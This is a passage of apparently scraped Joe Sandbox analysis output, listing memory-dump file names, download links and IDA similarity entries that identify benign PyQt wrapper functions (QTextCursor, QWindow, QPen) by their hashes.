                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?position@Cursor@@FromLongLong_Text
                                                                                                                                                                                                                • String ID: QTextCursor$position$position(self) -> int
                                                                                                                                                                                                                • API String ID: 2913035153-1292035848
                                                                                                                                                                                                                • Opcode ID: facb01baf3f37abaad323a40f193a153db5753c6434de81d26b321225ef5c25b
                                                                                                                                                                                                                • Instruction ID: bd9061208ff367ced43948c48df8e94d489f99241a55e3661cb819a96b627908
                                                                                                                                                                                                                • Opcode Fuzzy Hash: facb01baf3f37abaad323a40f193a153db5753c6434de81d26b321225ef5c25b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E012CB5B08B56C1EB109F71E8986A933A8FB94794F9140B2CA5D43320DFBDD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                • String ID: QTextCharFormat$fontPointSize$fontPointSize(self) -> float
                                                                                                                                                                                                                • API String ID: 2584946227-1070637524
                                                                                                                                                                                                                • Opcode ID: cafd996d4196c070e0f89b6d0a58fc5e39b5f276f46bd82ac679ce50e0a6627b
                                                                                                                                                                                                                • Instruction ID: 745095708716c86b8bcde274e9eca40d306049fdbed3f79963163eb5e04b6c85
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafd996d4196c070e0f89b6d0a58fc5e39b5f276f46bd82ac679ce50e0a6627b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7101DAB5A08B46C1EB10DF61E8896A937B8FB54795F9140B6CE5D03320CF7DD659C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Format@Format@@FromLongTableText
                                                                                                                                                                                                                • String ID: QTextTableFormat$isValid$isValid(self) -> bool
                                                                                                                                                                                                                • API String ID: 278077486-1309667952
                                                                                                                                                                                                                • Opcode ID: 0a2483fea6c28a57448423f8e915eea6136c4027a7dd86fe49c6e12221b86afe
                                                                                                                                                                                                                • Instruction ID: 4a575dee6e5ae2819fd21138262e3d457c33e79fbeb5c795decfefdbe1fbb160
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a2483fea6c28a57448423f8e915eea6136c4027a7dd86fe49c6e12221b86afe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D0128B5A08B56D1EB209F31E8886A833A8FB54B45F9140B2CE9D13370DF7CD59AC340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLongVisible@Window@@
                                                                                                                                                                                                                • String ID: QWindow$isVisible$isVisible(self) -> bool
                                                                                                                                                                                                                • API String ID: 4116707144-221774103
                                                                                                                                                                                                                • Opcode ID: 5c6bf6fb62ada924df914df944dd0a36186b9932f203c2f6c61bfcbd3d93c42e
                                                                                                                                                                                                                • Instruction ID: f0460abf4767980de37333545a21810f74fee0baeef89c9f252051b815412ec2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c6bf6fb62ada924df914df944dd0a36186b9932f203c2f6c61bfcbd3d93c42e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6011AB5A08A56C1EB509F25E8586A933A8FB84B44FA140B2CA5D03320CF7DD599C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?blockBlock@@FormatFromIndex@LongLong_Text
                                                                                                                                                                                                                • String ID: QTextBlock$blockFormatIndex$blockFormatIndex(self) -> int
                                                                                                                                                                                                                • API String ID: 2356950037-256987834
                                                                                                                                                                                                                • Opcode ID: 3aca6f2527676b6646d0a6ef89f06247801905764c31b63f17e4e67c7859b78f
                                                                                                                                                                                                                • Instruction ID: 631100477f14bec6d4227171a96d3e7e3aa7d7bf64719e8c1650de6f23f5358f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3aca6f2527676b6646d0a6ef89f06247801905764c31b63f17e4e67c7859b78f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E0128B5B08B46D1EB609F70E8486A833A8FB54B84F9140B6CA4D43320DFBCD64AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLongPen@@Solid@
                                                                                                                                                                                                                • String ID: QPen$isSolid$isSolid(self) -> bool
                                                                                                                                                                                                                • API String ID: 1289338498-3635444802
                                                                                                                                                                                                                • Opcode ID: 8a062b1a5f388ef04afe7ff2de86638f538821326fe79b88aa41bfd7633597a7
                                                                                                                                                                                                                • Instruction ID: 862b1523c672352e9d096fd529f8ddf20f1be1db339e8c6a512a649a50dd9c94
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a062b1a5f388ef04afe7ff2de86638f538821326fe79b88aa41bfd7633597a7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00017CB1A08B46C0EB10DF31E8486A833A8FB80785FA140B6CE5C03320CF7CD54AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Cursor@@FromLongStart@Text
                                                                                                                                                                                                                • String ID: QTextCursor$atStart$atStart(self) -> bool
                                                                                                                                                                                                                • API String ID: 1299828547-3033060353
                                                                                                                                                                                                                • Opcode ID: 96dd7f43f7e3418f2c65cd6abae6e2f5bd1498b57b3d3457512b6b86ce8bd99b
                                                                                                                                                                                                                • Instruction ID: 301174519155be2da2a77599acd7a3a1fc286993e7f5c436a3ff303f742c15b5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96dd7f43f7e3418f2c65cd6abae6e2f5bd1498b57b3d3457512b6b86ce8bd99b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89012CB5B08A56C1EB10DF61E8986A933A8FB55B85F9140B6CA5C53320CF7DD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?pageCount@Document@@FromLongLong_Text
                                                                                                                                                                                                                • String ID: QTextDocument$pageCount$pageCount(self) -> int
                                                                                                                                                                                                                • API String ID: 1736724193-481299524
                                                                                                                                                                                                                • Opcode ID: 88d7722ae5545a38fb75bfef27660c594cfcf42f700071466113a2d608b5765c
                                                                                                                                                                                                                • Instruction ID: 89c05be0b2a00825841383d94fdfc37c69da50c6415b0ee2e345af6ca7cf606e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88d7722ae5545a38fb75bfef27660c594cfcf42f700071466113a2d608b5765c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C01E8B5B08A46C1EB209F71E8986A937A8FB95B44FA140B2CA5D43320DF7DD959C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
